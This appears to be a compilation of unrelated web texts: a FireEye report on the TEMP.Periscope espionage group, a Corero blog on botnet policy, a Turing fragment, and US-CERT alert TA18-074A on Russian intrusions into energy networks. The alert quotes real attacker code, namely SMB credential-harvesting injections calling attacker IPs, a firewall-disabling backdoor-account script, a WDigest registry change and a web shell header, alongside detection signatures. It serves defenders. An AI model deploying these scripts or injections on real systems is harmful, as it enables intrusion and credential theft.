Since early 2018, FireEye (including our FireEye as a Service (FaaS), Mandiant Consulting, and iSIGHT Intelligence teams) has been tracking an ongoing wave of intrusions targeting engineering and maritime entities, especially those connected to South China Sea issues. The campaign is linked to a group of suspected Chinese cyber espionage actors we have tracked since 2013, dubbed TEMP.Periscope. The group has also been reported as “Leviathan” by other security firms.

The current campaign is a sharp escalation of detected activity since summer 2017. Like multiple other Chinese cyber espionage actors, TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit. Known targets of this group have been involved in the maritime industry, as well as engineering-focused entities, and include research institutes, academic organizations, and private firms in the United States. FireEye products have robust detection for the malware used in this campaign.

TEMP.Periscope Background

Active since at least 2013, TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals, including engineering firms, shipping and transportation, manufacturing, defense, government offices, and research universities. However, the group has also targeted professional/consulting services, high-tech industry, healthcare, and media/publishing. Identified victims were mostly found in the United States, although organizations in Europe and at least one in Hong Kong have also been affected. TEMP.Periscope overlaps in targeting, as well as tactics, techniques, and procedures (TTPs), with TEMP.Jumper, a group that also overlaps significantly with public reporting on “NanHaiShu.”

TTPs and Malware Used

In their recent spike in activity, TEMP.Periscope has leveraged a relatively large library of malware shared with multiple other suspected Chinese groups. These tools include:

  • AIRBREAK: a JavaScript-based backdoor also reported as “Orz” that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.
  • BADFLICK: a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command and control (C2) configuration.
  • PHOTO: a DLL backdoor also reported publicly as “Derusbi”, capable of obtaining directory, file, and drive listing; creating a reverse shell; performing screen captures; recording video and audio; listing, terminating, and creating processes; enumerating, starting, and deleting registry keys and values; logging keystrokes, returning usernames and passwords from protected storage; and renaming, deleting, copying, moving, reading, and writing to files.
  • HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors. Some strings are obfuscated with XOR x56. The malware accepts up to two arguments at the command line: one to display cleartext credentials for each login session, and a second to display cleartext credentials, NTLM hashes, and malware version for each login session.
  • LUNCHMONEY: an uploader that can exfiltrate files to Dropbox.
  • MURKYTOP: a command-line reconnaissance tool. It can be used to execute files as a different user, move, and delete files locally, schedule remote AT jobs, perform host discovery on connected networks, scan for open ports on hosts in a connected network, and retrieve information about the OS, users, groups, and shares on remote hosts.
  • China Chopper: a simple code injection webshell that executes Microsoft .NET code within HTTP POST commands. This allows the shell to upload and download files, execute applications with web server account permissions, list directory contents, access Active Directory, access databases, and any other action allowed by the .NET runtime.

The following are tools that TEMP.Periscope has leveraged in past operations and could use again, though these have not been seen in the current wave of activity:

  • Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform, commonly used for pen-testing network environments. The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands.
  • BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as Github and Microsoft's Technet portal. Used by APT17 and other Chinese cyber espionage operators.

Additional identifying TTPs include:

  • Spear phishing, including the use of probably compromised email accounts.
  • Lure documents using CVE-2017-11882 to drop malware.
  • Stolen code signing certificates used to sign malware.
  • Use of bitsadmin.exe to download additional tools.
  • Use of PowerShell to download additional tools.
  • Using C:\Windows\Debug and C:\Perflogs as staging directories.
  • Leveraging Hyperhost VPS and Proton VPN exit nodes to access webshells on internet-facing systems.
  • Using Windows Management Instrumentation (WMI) for persistence.
  • Using Windows Shortcut files (.lnk) in the Startup folder that invoke the Windows Scripting Host (wscript.exe) to execute a Jscript backdoor for persistence.
  • Receiving C2 instructions from user profiles created by the adversary on legitimate websites/forums such as Github and Microsoft's TechNet portal.


The current wave of identified intrusions is consistent with TEMP.Periscope and likely reflects a concerted effort to target sectors that may yield information that could provide an economic advantage, research and development data, intellectual property, or an edge in commercial negotiations.

As we continue to investigate this activity, we may identify additional data leading to greater analytical confidence linking the operation to TEMP.Periscope or other known threat actors, as well as previously unknown campaigns.







HOMEFRY, a 64-bit Windows password dumper/cracker



MURKYTOP, a command-line reconnaissance tool 



AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages

Historical Indicators






AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages



Beacon, a commercially available backdoor



PHOTO, also reported as Derusbi



BADFLICK, backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration

The US Government Vs Botnets

U.S. government agencies are working hard to solve the problem of botnets and other cyber threats, and are asking for input from various stakeholders. In July 2017 the National Institute of Standards and Technology (NIST) conducted a Workshop on “Enhancing Resilience of the Internet and Communications Ecosystem.” The proceedings of that workshop were published as NISTIR 8192, "Enhancing Resilience of the Internet and Communications Ecosystem: A NIST Workshop Proceedings." Then, in early January the US Secretary of Commerce and Secretary of Homeland Security submitted A Report to the President on Enhancing the Resilience of the Internet and Communications Ecosystem against Botnets and Other Automated, Distributed Threats.”

To follow up on that report, which was open to public comments for 30 days, the National Institute of Standards and Technology (NIST) conducted a 2nd workshop, called “Enhancing Resilience of the Internet & Communications.” The workshop was held February 28-March 1 at NIST’s National Cybersecurity Center of Excellence (NCCEO) in Rockville, Maryland.

The workshop discussed substantive public comments, including open issues, on the draft report about actions to address automated and distributed threats to the digital ecosystem as part of the activity directed by Executive Order 13800, “Strengthening the Cybersecurity of Federal Networks and Critical Infrastructure.” According to the NIST website, “The Departments of Commerce and Homeland Security seek to engage all interested stakeholders—including private industry, academia, civil society, and other security experts—on the draft report, its characterization of the threat landscape, the goals laid out, and the actions to further these goals.” A final report from the departments of Homeland Security and Commerce, incorporating comments and other feedback received, is due to President Trump on May 11, 2018.

These workshops and reports are important steps in the right direction. It seems quite clear to various stakeholders across industry and government sectors that industry-government collaboration is essential to thwart cyber security threats. For starters, government can walk the talk by implementing best security practices and technologies in its operations, whether at federal or state levels. In addition, government can influence the marketplace via regulations and policies that are designed to make the Internet safer. For example, government may mandate that manufacturers build in tighter security for IoT devices, to make it harder for hackers to recruit those devices into botnets. Another possibility is that the government may impose regulations on Internet service providers, requiring them to provide protection from DDoS attacks, for example.

The Departments of Commerce and Homeland Security response to the Presidents’ Executive Order calls for businesses to improve their resilience to DDoS attacks. Corero released the “Government Response to Rise in IoT DDoS Botnet Threats” Solution Brief to detail how our solutions help our customers defend themselves against all DDoS attacks and to answer business and consumer requests for better protection from cyber threats. In general, businesses and consumers have influenced the marketplace by asking for (or in some ways, demanding) better protection from cyber threats. Competition inspires vendors to offer better solutions, and enterprises to adopt those solutions. For the sake of risk management, many companies have already taken steps to increase cyber security. And many telecommunications companies have responded to the market demand for DDoS protection, by offering DDoS protection as a service to their customers. On the other hand, some enterprises don’t understand the risks of DDoS attacks or take steps to mitigate them; the government can’t regulate or police all enterprises. If a major website gets attacked (perhaps a bank, or a hospital) and it impacts thousands of civilians, then both civilians and the enterprise are victimized. A case in point was the massive DDoS attack against Dyn, which impacted millions of end-users.

It’s crucial that the U.S. government take steps to advance cyber security. It can’t do it alone, however. When safeguarding the Internet for all users, a multi-stakeholder approach is essential. Though the government can help reduce IoT botnets, it cannot completely eliminate them, partly because the U.S. government can’t completely control what manufacturers do and what end-users do, especially in other countries. No one can assume that vendors around the world will bake in better security for IoT devices, or change their default passwords or update devices with security patches. No matter how heavily IoT devices are regulated or how many consumers are educated, millions of such devices around the world will still be unsecured and vulnerable to being recruited into a botnet.

Read Corero’s Government Response to Rise in IoT DDoS Botnet Threats Solution Brief to learn how our DDoS Defense solutions solve the problem of botnet-driven DDoS attacks. We have been a leader in DDoS protection solutions for over a decade, contact us to learn more about how we can help protect your network from all DDoS attacks.

Alan Turing and the birth of machine intelligence

“We may compare a man in the process of computing a real number to a machine which is only capable of a finite number of conditions…” – Alan Turing


It is difficult to tell the history of AI without first describing the formalization of computation and what it means for something to compute. The primary impetus towards formalization came down to a question posed by the mathematician David Hilbert in 1928.

TA18-074A: Russian Government Cyber Activity Targeting Energy and Other Critical Infrastructure Sectors

Original release date: March 15, 2018 | Last revised: March 16, 2018

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers


This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.


Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1]

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including

  • spear-phishing emails (from compromised legitimate account),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.


Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.


Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]


Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.


<img src="[:]//62.8.193[.]206/main_logo.png" style="height: 1px; width: 1px;" />


In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:


var i = document.createElement("img");

i.src = "file[:]//184.154.150[.]66/ame_icon.png";

i.width = 3;



Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled ``document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.


Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1]


Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.


Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.


Contents of symantec_help.jsp


<% Runtime.getRuntime().exec("cmd /C \"" + System.getProperty("user.dir") + "\\..\\webapps\\ROOT\\<enu.cmd>\""); %>


The script “enu.cmd” created an administrator account, disabled the host-based firewall, and globally opened port 3389 for Remote Desktop Protocol (RDP) access. The script then attempted to add the newly created account to the administrators group to gain elevated privileges. This script contained hard-coded values for the group name “administrator” in Spanish, Italian, German, French, and English.


Contents of enu.cmd


netsh firewall set opmode disable

netsh advfirewall set allprofiles state off

reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List" /v 3389:TCP /t REG_SZ /d "3389:TCP:*:Enabled:Remote Desktop" /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f

reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Licensing Core" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v EnableConcurrentSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AllowMultipleTSSessions /t REG_DWORD /d 1 /f

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v MaxInstanceCount /t REG_DWORD /d 100 /f

net user MS_BACKUP <Redacted_Password> /add

net localgroup Administrators /add MS_BACKUP

net localgroup Administradores /add MS_BACKUP

net localgroup Amministratori /add MS_BACKUP

net localgroup Administratoren /add MS_BACKUP

net localgroup Administrateurs /add MS_BACKUP

net localgroup "Remote Desktop Users" /add MS_BACKUP

net user MS_BACKUP /expires:never

reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v MS_BACKUP /t REG_DWORD /d 0 /f

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

sc config termservice start= auto

net start termservice


DHS observed the threat actors using this and similar scripts to create multiple accounts within staging target networks. Each account created by the threat actors served a specific purpose in their operation. These purposes ranged from the creation of additional accounts to cleanup of activity. DHS and FBI observed the following actions taken after the creation of these local accounts:

Account 1: Account 1 was named to mimic backup services of the staging target. This account was created by the malicious script described earlier. The threat actor used this account to conduct open-source reconnaissance and remotely access intended targets.

Account 2: Account 1 was used to create Account 2 to impersonate an email administration account. The only observed action was to create Account 3.

Account 3: Account 3 was created within the staging victim’s Microsoft Exchange Server. A PowerShell script created this account during an RDP session while the threat actor was authenticated as Account 2. The naming conventions of the created Microsoft Exchange account followed that of the staging target (e.g., first initial concatenated with the last name).

Account 4: In the latter stage of the compromise, the threat actor used Account 1 to create Account 4, a local administrator account. Account 4 was then used to delete logs and cover tracks.


Scheduled Task

In addition, the threat actors created a scheduled task named reset, which was designed to automatically log out of their newly created account every eight hours.


VPN Software

After achieving access to staging targets, the threat actors installed tools to carry out operations against intended victims. On one occasion, threat actors installed the free version of FortiClient, which they presumably used as a VPN client to connect to intended target networks.


Password Cracking Tools

Consistent with the perceived goal of credential harvesting, the threat actors dropped and executed open source and free tools such as Hydra, SecretsDump, and CrackMapExec. The naming convention and download locations suggest that these files were downloaded directly from publically available locations such as GitHub. Forensic analysis indicates that many of these tools were executed during the timeframe in which the actor was accessing the system. Of note, the threat actors installed Python 2.7 on a compromised host of one staging victim, and a Python script was seen at C:\Users\<Redacted Username>\Desktop\OWAExchange\.



Once inside of an intended target’s network, the threat actor downloaded tools from a remote server. The initial versions of the file names contained .txt extensions and were renamed to the appropriate extension, typically .exe or .zip.

In one example, after gaining remote access to the network of an intended victim, the threat actor carried out the following actions:

  • The threat actor connected to 91.183.104[.]150 and downloaded multiple files, specifically the file INST.txt.
  • The files were renamed to new extensions, with INST.txt being renamed INST.exe.
  • The files were executed on the host and then immediately deleted.
  • The execution of INST.exe triggered a download of ntdll.exe, and shortly after, ntdll.exe appeared in the running process list of the compromised system of an intended target.
  • The registry value “ntdll” was added to the “HKEY_USERS\<USER SID>\Software\Microsoft\Windows\CurrentVersion\Run” key.


Persistence Through .LNK File Manipulation

The threat actors manipulated LNK files, commonly known as a Microsoft Window’s shortcut file, to repeatedly gather user credentials. Default Windows functionality enables icons to be loaded from a local or remote Windows repository. The threat actors exploited this built-in Windows functionality by setting the icon path to a remote server controller by the actors. When the user browses to the directory, Windows attempts to load the icon and initiate an SMB authentication session. During this process, the active user’s credentials are passed through the attempted SMB connection.

Four of the observed LNK files were “SETROUTE.lnk”, “notepad.exe.lnk”, “Document.lnk” and “desktop.ini.lnk”. These names appeared to be contextual, and the threat actor may use a variety of other file names while using this tactic. Two of the remote servers observed in the icon path of these LNK files were 62.8.193[.]206 and 5.153.58[.]45. Below is the parsed content of one of the LNK files:

Parsed content of one of the LNK files

Parsed output for file: desktop.ini.lnk

Registry Modification

The threat actor would modify key systems to store plaintext credentials in memory. In one instance, the threat actor executed the following command.


reg add "HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest" /v UseLogonCredential /t REG_DWORD /d 1 /f


Stage 6: Command and Control

The threat actors commonly created web shells on the intended targets’ publicly accessible email and web servers. The threat actors used three different filenames (“global.aspx, autodiscover.aspx and index.aspx) for two different webshells. The difference between the two groups was the “public string Password” field.


Beginning Contents of the Web Shell


<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false" EnableViewStateMac="false" EnableViewState="true"%>

<%@ import Namespace="System"%>

<%@ import Namespace="System.IO"%>

<%@ import Namespace="System.Diagnostics"%>

<%@ import Namespace="System.Data"%>

<%@ import Namespace="System.Management"%>

<%@ import Namespace="System.Data.OleDb"%>

<%@ import Namespace="Microsoft.Win32"%>

<%@ import Namespace="System.Net.Sockets" %>

<%@ import Namespace="System.Net" %>

<%@ import Namespace="System.Runtime.InteropServices"%>

<%@ import Namespace="System.DirectoryServices"%>

<%@ import Namespace="System.ServiceProcess"%>

<%@ import Namespace="System.Text.RegularExpressions"%>

<%@ Import Namespace="System.Threading"%>

<%@ Import Namespace="System.Data.SqlClient"%>

<%@ import Namespace="Microsoft.VisualBasic"%>

<%@ Import Namespace="System.IO.Compression" %>

<%@ Assembly Name="System.DirectoryServices,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="System.Management,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="System.ServiceProcess,Version=,Culture=neutral,PublicKeyToken=B03F5F7F11D50A3A"%>

<%@ Assembly Name="Microsoft.VisualBasic,Version=7.0.3300.0,Culture=neutral,PublicKeyToken=b03f5f7f11d50a3a"%>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "">

<script runat = "server">

public string Password = "<REDACTED>";

public string z_progname = "z_WebShell";



Stage 7: Actions on Objectives

DHS and FBI identified the threat actors leveraging remote access services and infrastructure such as VPN, RDP, and Outlook Web Access (OWA). The threat actors used the infrastructure of staging targets to connect to several intended targets.


Internal Reconnaissance

Upon gaining access to intended victims, the threat actors conducted reconnaissance operations within the network. DHS observed the threat actors focusing on identifying and browsing file servers within the intended victim’s network.

Once on the intended target’s network, the threat actors used privileged credentials to access the victim’s domain controller typically via RDP. Once on the domain controller, the threat actors used the batch scripts “dc.bat” and “dit.bat” to enumerate hosts, users, and additional information about the environment. The observed outputs (text documents) from these scripts were:

  • admins.txt
  • completed_dclist.txt
  • completed_trusts.txt
  • completed_zone.txt
  • comps.txt
  • conditional_forwarders.txt
  • domain_zone.txt
  • enum_zones.txt
  • users.txt

The threat actors also collected the files “ntds.dit” and the “SYSTEM” registry hive. DHS observed the threat actors compress all of these files into archives named “” and “”.

The threat actors used Windows’ scheduled task and batch scripts to execute “scr.exe” and collect additional information from hosts on the network. The tool “scr.exe” is a screenshot utility that the threat actor used to capture the screen of systems across the network. The MD5 hash of “scr.exe” matched the MD5 of ScreenUtil, as reported in the Symantec Dragonfly 2.0 report.

In at least two instances, the threat actors used batch scripts labeled “pss.bat” and “psc.bat” to run the PsExec tool. Additionally, the threat actors would rename the tool PsExec to “ps.exe”.

  1. The batch script (“pss.bat” or “psc.bat”) is executed with domain administrator credentials.
  2. The directory “out” is created in the user’s %AppData% folder.
  3. PsExec is used to execute “scr.exe” across the network and to collect screenshots of systems in “ip.txt”.
  4. The screenshot’s filename is labeled based on the computer name of the host and stored in the target’s C:\Windows\Temp directory with a “.jpg” extension.
  5. The screenshot is then copied over to the newly created “out” directory of the system where the batch script was executed.
  6. In one instance, DHS observed an “” file created.

DHS observed the threat actors create and modify a text document labeled “ip.txt” which is believed to have contained a list of host information. The threat actors used “ip.txt” as a source of hosts to perform additional reconnaissance efforts. In addition, the text documents “res.txt” and “err.txt” were observed being created as a result of the batch scripts being executed. In one instance, “res.txt” contained output from the Windows’ command “query user” across the network.


Using <Username> <Password>
Running -s cmd /c query user on <Hostname1>
Running -s cmd /c query user on <Hostname2>
Running -s cmd /c query user on <Hostname3>
<user1>                                              2       Disc       1+19:34         6/27/2017 12:35 PM


An additional batch script named “dirsb.bat” was used to gather folder and file names from hosts on the network.

In addition to the batch scripts, the threat actors also used scheduled tasks to collect screenshots with “scr.exe”. In two instances, the scheduled tasks were designed to run the command “C:\Windows\Temp\scr.exe” with the argument “C:\Windows\Temp\scr.jpg”. In another instance, the scheduled task was designed to run with the argument “pss.bat” from the local administrator’s “AppData\Local\Microsoft\” folder.

The threat actors commonly executed files out of various directories within the user’s AppData or Downloads folder. Some common directory names were

  • Chromex64,
  • Microsoft_Corporation,
  • NT,
  • Office365,
  • Temp, and
  • Update.


Targeting of ICS and SCADA Infrastructure

In multiple instances, the threat actors accessed workstations and servers on a corporate network that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. Based on DHS analysis of existing compromises, these files were named containing ICS vendor names and ICS reference documents pertaining to the organization (e.g., “SCADA WIRING DIAGRAM.pdf” or “SCADA PANEL LAYOUTS.xlsx”).

The threat actors targeted and copied profile and configuration information for accessing ICS systems on the network. DHS observed the threat actors copying Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems. DHS was able to reconstruct screenshot fragments of a Human Machine Interface (HMI) that the threat actors accessed.

This image depicts a reconstructed screenshot of a Human Machine Interface (HMI) system that was accessed by the threat actor. This image demonstrates the threat actor's focus and interest in Industrial Control System (ICS) environments.


Cleanup and Cover Tracks

In multiple instances, the threat actors created new accounts on the staging targets to perform cleanup operations. The accounts created were used to clear the following Windows event logs: System, Security, Terminal Services, Remote Services, and Audit. The threat actors also removed applications they installed while they were in the network along with any logs produced. For example, the Fortinet client installed at one commercial facility was deleted along with the logs that were produced from its use. Finally, data generated by other accounts used on the systems accessed were deleted.

Threat actors cleaned up intended target networks through deleting created screenshots and specific registry keys. Through forensic analysis, DHS determined that the threat actors deleted the registry key associated with terminal server client that tracks connections made to remote systems. The threat actors also deleted all batch scripts, output text documents and any tools they brought into the environment such as “scr.exe”.


Detection and Response

IOCs related to this campaign are provided within the accompanying .csv and .stix files of this alert. DHS and FBI recommend that network administrators review the IP addresses, domain names, file hashes, network signatures, and YARA rules provided, and add the IPs to their watchlists to determine whether malicious activity has been observed within their organization. System owners are also advised to run the YARA tool on any system suspected to have been targeted by these threat actors.


Network Signatures and Host-Based Rules

This section contains network signatures and host-based rules that can be used to detect malicious activity associated with threat actor TTPs. Although these network signatures and host-based rules were created using a comprehensive vetting process, the possibility of false positives always remains.


Network Signatures

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/aspnet_client/system_web/4_0_30319/update/' (Beacon)"; sid:42000000; rev:1; flow:established,to_server; content:"/aspnet_client/system_web/4_0_30319/update/"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/img/bson021.dat'"; sid:42000001; rev:1; flow:established,to_server; content:"/img/bson021.dat"; http_uri; fast_pattern:only; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI contains '/A56WY' (Callback)"; sid:42000002; rev:1; flow:established,to_server; content:"/A56WY"; http_uri; fast_pattern; classtype:bad-unknown; metadata:service http;)


alert tcp any any -> any 445 (msg:"SMB Client Request contains 'AME_ICON.PNG' (SMB credential harvesting)"; sid:42000003; rev:1; flow:established,to_server; content:"|FF|SMB|75 00 00 00 00|"; offset:4; depth:9; content:"|08 00 01 00|"; distance:3; content:"|00 5c 5c|"; distance:2; within:3; content:"|5c|AME_ICON.PNG"; distance:7; fast_pattern; classtype:bad-unknown; metadata:service netbios-ssn;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP URI OPTIONS contains '/ame_icon.png' (SMB credential harvesting)"; sid:42000004; rev:1; flow:established,to_server; content:"/ame_icon.png"; http_uri; fast_pattern:only; content:"OPTIONS"; nocase; http_method; classtype:bad-unknown; metadata:service http;)


alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"HTTP Client Header contains 'User-Agent|3a 20|Go-http-client/1.1'"; sid:42000005; rev:1; flow:established,to_server; content:"User-Agent|3a 20|Go-http-client/1.1|0d 0a|Accept-Encoding|3a 20|gzip"; http_header; fast_pattern:only; pcre:"/\.(?:aspx|txt)\?[a-z0-9]{3}=[a-z0-9]{32}&/U"; classtype:bad-unknown; metadata:service http;)


alert tcp $EXTERNAL_NET [139,445] -> $HOME_NET any (msg:"SMB Server Traffic contains NTLM-Authenticated SMBv1 Session"; sid:42000006; rev:1; flow:established,to_client; content:"|ff 53 4d 42 72 00 00 00 00 80|"; fast_pattern:only; content:"|05 00|"; distance:23; classtype:bad-unknown; metadata:service netbios-ssn;)

YARA Rules

This is a consolidated rule set for malware associated with this activity. These rules were written by NCCIC and include contributions from trusted partners.



rule APT_malware_1



            description = "inveigh pen testing tools & related artifacts"

            author = "DHS | NCCIC Code Analysis Team"    

            date = "2017/07/17"

            hash0 = "61C909D2F625223DB2FB858BBDF42A76"

            hash1 = "A07AA521E7CAFB360294E56969EDA5D6"

            hash2 = "BA756DD64C1147515BA2298B6A760260"

            hash3 = "8943E71A8C73B5E343AA9D2E19002373"

            hash4 = "04738CA02F59A5CD394998A99FCD9613"

            hash5 = "038A97B4E2F37F34B255F0643E49FC9D"

            hash6 = "65A1A73253F04354886F375B59550B46"

            hash7 = "AA905A3508D9309A93AD5C0EC26EBC9B"

            hash8 = "5DBEF7BDDAF50624E840CCBCE2816594"

            hash9 = "722154A36F32BA10E98020A8AD758A7A"

            hash10 = "4595DBE00A538DF127E0079294C87DA0"


            $s0 = "file://"

